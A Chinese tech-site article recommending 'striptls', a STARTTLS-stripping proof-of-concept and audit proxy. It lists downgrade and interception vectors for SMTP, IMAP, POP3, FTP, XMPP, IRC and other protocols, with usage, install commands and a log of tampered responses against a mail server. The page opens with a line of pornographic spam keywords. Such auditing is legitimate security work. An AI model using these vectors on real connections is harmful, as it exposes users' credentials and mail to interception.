日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
工具推薦:striptls審計代理

STARTTLS 是對純文本通信協(xié)議的擴(kuò)展。它提供一種方式將純文本連接升級為加密連接(TLS或SSL),而不是另外使用一個端口作加密通信。

striptls是一款端口剝離攻擊的POC實現(xiàn)。

SMTP

 
 
 
    
  
  
  
  1. SMTP.StripFromCapabilities - server response capability patch 
    2. 
  
  
  
  2. SMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response code 
    3. 
  
  
  
  3. SMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd) 
    4. 
  
  
  
  4. SMTP.StripWithTemporaryError 
    5. 
  
  
  
  5. SMTP.StripWithError 
    6. 
  
  
  
  6. SMTP.ProtocolDowngradeStripExtendedMode 
    7. 
  
  
  
  7. SMTP.InjectCommand
    8.

POP3

 
 
 
    
  
  
  
  1. POP3.StripFromCapabilities 
    2. 
  
  
  
  2. POP3.StripWithError 
    3. 
  
  
  
  3. POP3.UntrustedIntercept
    4.

IMAP

 
 
 
    
  
  
  
  1. IMAP.StripFromCapabilities 
    2. 
  
  
  
  2. IMAP.StripWithError 
    3. 
  
  
  
  3. IMAP.UntrustedIntercept 
    4. 
  
  
  
  4. IMAP.ProtocolDowngradeToV2
    5.

FTP

 
 
 
    
  
  
  
  1. FTP.StripFromCapabilities 
    2. 
  
  
  
  2. FTP.StripWithError 
    3. 
  
  
  
  3. FTP.UntrustedIntercept
    4.

NNTP

 
 
 
    
  
  
  
  1. NNTP.StripFromCapabilities 
    2. 
  
  
  
  2. NNTP.StripWithError 
    3. 
  
  
  
  3. NNTP.UntrustedIntercept
    4.

XMPP

 
 
 
    
  
  
  
  1. XMPP.StripFromCapabilities 
    2. 
  
  
  
  2. XMPP.StripInboundTLS 
    3. 
  
  
  
  3. XMPP.UntrustedIntercept 
    4. 
  
  
  
  4. ACAP (untested) 
    5. 
  
  
  
  5. ACAP.StripFromCapabilities 
    6. 
  
  
  
  6. ACAP.StripWithError 
    7. 
  
  
  
  7. ACAP.UntrustedIntercept
    8.

IRC

 
 
 
    
  
  
  
  1. IRC.StripFromCapabilities 
    2. 
  
  
  
  2. IRC.StripWithError 
    3. 
  
  
  
  3. IRC.UntrustedIntercept 
    4. 
  
  
  
  4. IRC.StripWithNotRegistered 
    5. 
  
  
  
  5. IRC.StripCAPWithNotregistered 
    6. 
  
  
  
  6. IRC.StripWithSilentDrop
    7.

結(jié)果:

 
 
 
    
  
  
  
  1. - [*] client: 127.0.0.1
    2. 
  
  
  
  2. -     [Vulnerable!]  
    3. 
  
  
  
  3. -     [Vulnerable!]  
    4. 
  
  
  
  4. -     [           ]  
    5. 
  
  
  
  5. -     [Vulnerable!]  
    6. 
  
  
  
  6. - [*] client: 192.168.139.1
    7. 
  
  
  
  7. -     [Vulnerable!]  
    8. 
  
  
  
  8. -     [Vulnerable!]  
    9. 
  
  
  
  9. -     [Vulnerable!] 
    10.

實例:

 
 
 
    
  
  
  
  1. #> python -m striptls --help    # from pip/setup.py#> python striptls --help       # from source / root folderUsage: striptls [options] 
    2. 
  
  
  
  2. 
  
  
  
  3.        example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25Options: 
    4. 
  
  
  
  4.       -h, --help            show this help message and exit  -v, --verbose         make lots of noise [default] 
    5. 
  
  
  
  5.       -l LISTEN, --listen=LISTENlisten ip:port [default: 0.0.0.0:] 
    6. 
  
  
  
  6.       -r REMOTE, --remote=REMOTE 
    7. 
  
  
  
  7.                             remote target ip:port to forward sessions to 
    8. 
  
  
  
  8.       -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEMformat assumed [default: server.pem] 
    9. 
  
  
  
  9.       -x VECTORS, --vectors=VECTORS 
    10. 
  
  
  
  10.                             Comma separated list of vectors. Use 'ALL' (default) 
    11. 
  
  
  
  11.                             to select all vectors. Available vectors: 
    12. 
  
  
  
  12.                             FTP.StripFromCapabilities, FTP.StripWithError, 
    13. 
  
  
  
  13.                             FTP.UntrustedIntercept, IMAP.StripFromCapabilities, 
    14. 
  
  
  
  14.                             IMAP.StripWithError, IMAP.UntrustedIntercept, 
    15. 
  
  
  
  15.                             NNTP.StripFromCapabilities, NNTP.StripWithError, 
    16. 
  
  
  
  16.                             NNTP.UntrustedIntercept, POP3.StripFromCapabilities, 
    17. 
  
  
  
  17.                             POP3.StripWithError, POP3.UntrustedIntercept, 
    18. 
  
  
  
  18.                             SMTP.ProtocolDowngradeStripExtendedMode, 
    19. 
  
  
  
  19.                             SMTP.StripFromCapabilities, SMTP.StripWithError, 
    20. 
  
  
  
  20.                             SMTP.StripWithInvalidResponseCode, 
    21. 
  
  
  
  21.                             SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept, 
    22. 
  
  
  
  22.                             XMPP.StripFromCapabilities, XMPP.StripInboundTLS, 
    23. 
  
  
  
  23.                             XMPP.UntrustedIntercept [default: ALL]
    24.

安裝:

1.從pip安裝

#> pip install striptls

2.從源安裝

#> setup.py install

示例:

 
 
 
    
  
  
  
  1.                 inbound                    outbound 
    2. 
  
  
  
  2. nbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target] 
    3. 
  
  
  
  3. smtp-client                   striptls                    remote/target
    4.

本地 smtp-client -> localhost:8825 (代理) -> mail.gmx.net:25

審計模式:

在特定的情況下遍歷所有協(xié)議并且跟蹤違反starttls協(xié)議的客戶端。你可以選擇按Ctrl + C來中止審核并打印結(jié)果。

 
 
 
    
  
  
  
  1. #> python striptls --listen localhost:8825 --remote=mail.gmx.net:25 
    2. 
  
  
  
  2. 2016-02-02 22:11:56,275 - INFO     -  ready. 
    3. 
  
  
  
  3. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP):  
    4. 
  
  
  
  4. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP):  
    5. 
  
  
  
  5. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP):  
    6. 
  
  
  
  6. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP):  
    7. 
  
  
  
  7. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP):  
    8. 
  
  
  
  8. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP):  
    9. 
  
  
  
  9. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP):  
    10. 
  
  
  
  10. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP):  
    11. 
  
  
  
  11. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP):  
    12. 
  
  
  
  12. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3):  
    13. 
  
  
  
  13. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3):  
    14. 
  
  
  
  14. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP):  
    15. 
  
  
  
  15. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP):  
    16. 
  
  
  
  16. 2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP):  
    17. 
  
  
  
  17. 2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP):  
    18. 
  
  
  
  18. 2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP):  
    19. 
  
  
  
  19. 2016-02-02 22:11:56,276 - DEBUG    - * added test (port:5222 , proto:    XMPP):  
    20. 
  
  
  
  20. 2016-02-02 22:11:56,276 - INFO     - ]), 110: set([]), 143: set([]), 21: set([]), 119: set([]), 25: set([])}> 
    21. 
  
  
  
  21. 2016-02-02 22:12:08,477 - DEBUG    -  - protocol detected (target port) 
    22. 
  
  
  
  22. 2016-02-02 22:12:08,530 - INFO     -  client ('127.0.0.1', 28902) has connected 
    23. 
  
  
  
  23. 2016-02-02 22:12:08,530 - INFO     -  connecting to target ('mail.gmx.net', 25) 
    24. 
  
  
  
  24. 2016-02-02 22:12:08,805 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
    25. 
  
  
  
  25. 2016-02-02 22:12:08,805 - DEBUG    -  
    26. 
  
  
  
  26. 2016-02-02 22:12:09,759 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
    27. 
  
  
  
  27. 2016-02-02 22:12:09,850 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
    28. 
  
  
  
  28. 2016-02-02 22:12:09,851 - DEBUG    -  [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
    29. 
  
  
  
  29. 2016-02-02 22:12:09,867 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
    30. 
  
  
  
  30. 2016-02-02 22:12:09,867 - DEBUG    -  [client] <= [server][mangled] '200 STRIPTLS\r\n'
    31. 
  
  
  
  31. 2016-02-02 22:12:09,867 - DEBUG    -  [client] => [server][mangled] None
    32. 
  
  
  
  32. 2016-02-02 22:12:09,883 - DEBUG    -  [client] => [server]          'mail FROM: size=10\r\n'
    33. 
  
  
  
  33. 2016-02-02 22:12:09,983 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
    34. 
  
  
  
  34. 2016-02-02 22:12:09,992 - DEBUG    -  [client] => [server]          'rset\r\n'
    35. 
  
  
  
  35. 2016-02-02 22:12:10,100 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
    36. 
  
  
  
  36. 2016-02-02 22:12:10,116 - WARNING  -  terminated. 
    37. 
  
  
  
  37. 2016-02-02 22:12:13,056 - DEBUG    -  - protocol detected (target port) 
    38. 
  
  
  
  38. 2016-02-02 22:12:13,056 - INFO     -  client ('127.0.0.1', 28905) has connected 
    39. 
  
  
  
  39. 2016-02-02 22:12:13,057 - INFO     -  connecting to target ('mail.gmx.net', 25) 
    40. 
  
  
  
  40. 2016-02-02 22:12:13,241 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
    41. 
  
  
  
  41. 2016-02-02 22:12:13,241 - DEBUG    -  
    42. 
  
  
  
  42. 2016-02-02 22:12:14,197 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
    43. 
  
  
  
  43. 2016-02-02 22:12:14,289 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
    44. 
  
  
  
  44. 2016-02-02 22:12:14,304 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
    45. 
  
  
  
  45. 2016-02-02 22:12:14,305 - DEBUG    -  [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
    46. 
  
  
  
  46. 2016-02-02 22:12:14,305 - DEBUG    -  [client] => [server][mangled] None
    47. 
  
  
  
  47. 2016-02-02 22:12:14,320 - DEBUG    -  [client] => [server]          'mail FROM: size=10\r\n'
    48. 
  
  
  
  48. 2016-02-02 22:12:14,411 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
    49. 
  
  
  
  49. 2016-02-02 22:12:14,415 - DEBUG    -  [client] => [server]          'rset\r\n'
    50. 
  
  
  
  50. 2016-02-02 22:12:14,520 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
    51. 
  
  
  
  51. 2016-02-02 22:12:14,535 - WARNING  -  terminated. 
    52. 
  
  
  
  52. 2016-02-02 22:12:16,649 - DEBUG    -  - protocol detected (target port) 
    53. 
  
  
  
  53. 2016-02-02 22:12:16,650 - INFO     -  client ('127.0.0.1', 28908) has connected 
    54. 
  
  
  
  54. 2016-02-02 22:12:16,650 - INFO     -  connecting to target ('mail.gmx.net', 25) 
    55. 
  
  
  
  55. 2016-02-02 22:12:16,820 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
    56. 
  
  
  
  56. 2016-02-02 22:12:16,820 - DEBUG    -  
    57. 
  
  
  
  57. 2016-02-02 22:12:17,760 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
    58. 
  
  
  
  58. 2016-02-02 22:12:17,849 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
    59. 
  
  
  
  59. 2016-02-02 22:12:17,849 - DEBUG    -  [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
    60. 
  
  
  
  60. 2016-02-02 22:12:17,871 - WARNING  -  terminated. 
    61. 
  
  
  
  61. 2016-02-02 22:12:20,071 - DEBUG    -  - protocol detected (target port) 
    62. 
  
  
  
  62. 2016-02-02 22:12:20,072 - INFO     -  client ('127.0.0.1', 28911) has connected 
    63. 
  
  
  
  63. 2016-02-02 22:12:20,072 - INFO     -  connecting to target ('mail.gmx.net', 25) 
    64. 
  
  
  
  64. 2016-02-02 22:12:20,239 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
    65. 
  
  
  
  65. 2016-02-02 22:12:20,240 - DEBUG    -  
    66. 
  
  
  
  66. 2016-02-02 22:12:21,181 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
    67. 
  
  
  
  67. 2016-02-02 22:12:21,269 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
    68. 
  
  
  
  68. 2016-02-02 22:12:21,280 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
    69. 
  
  
  
  69. 2016-02-02 22:12:21,281 - DEBUG    -  [client] <= [server][mangled] '501 Syntax error\r\n'
    70. 
  
  
  
  70. 2016-02-02 22:12:21,281 - DEBUG    -  [client] => [server][mangled] None
    71. 
  
  
  
  71. 2016-02-02 22:12:21,289 - DEBUG    -  [client] => [server]          'mail FROM: size=10\r\n'
    72. 
  
  
  
  72. 2016-02-02 22:12:21,381 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
    73. 
  
  
  
  73. 2016-02-02 22:12:21,386 - DEBUG    -  [client] => [server]          'rset\r\n'
    74. 
  
  
  
  74. 2016-02-02 22:12:21,469 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
    75. 
  
  
  
  75. 2016-02-02 22:12:21,485 - WARNING  -  terminated. 
    76. 
  
  
  
  76. 2016-02-02 22:12:23,665 - WARNING  - Ctrl C - Stopping server 
    77. 
  
  
  
  77. 2016-02-02 22:12:23,665 - INFO     -  -- audit results -- 
    78. 
  
  
  
  78. 2016-02-02 22:12:23,666 - INFO     - [*] client: 127.0.0.1
    79. 
  
  
  
  79. 2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!]  
    80. 
  
  
  
  80. 2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!]  
    81. 
  
  
  
  81. 2016-02-02 22:12:23,666 - INFO     -     [           ]  
    82. 
  
  
  
  82. 2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] 
    83.

除了審計模式外還有從服務(wù)端剝離starttls、無效化starttls響應(yīng)、不可行的ssl鏈接(對于客戶端則是不在檢驗服務(wù)端的證書是否可信)以及XMPP的追蹤審計的功能。


網(wǎng)站欄目:工具推薦:striptls審計代理
本文鏈接:http://m.5511xx.com/article/ccdjhse.html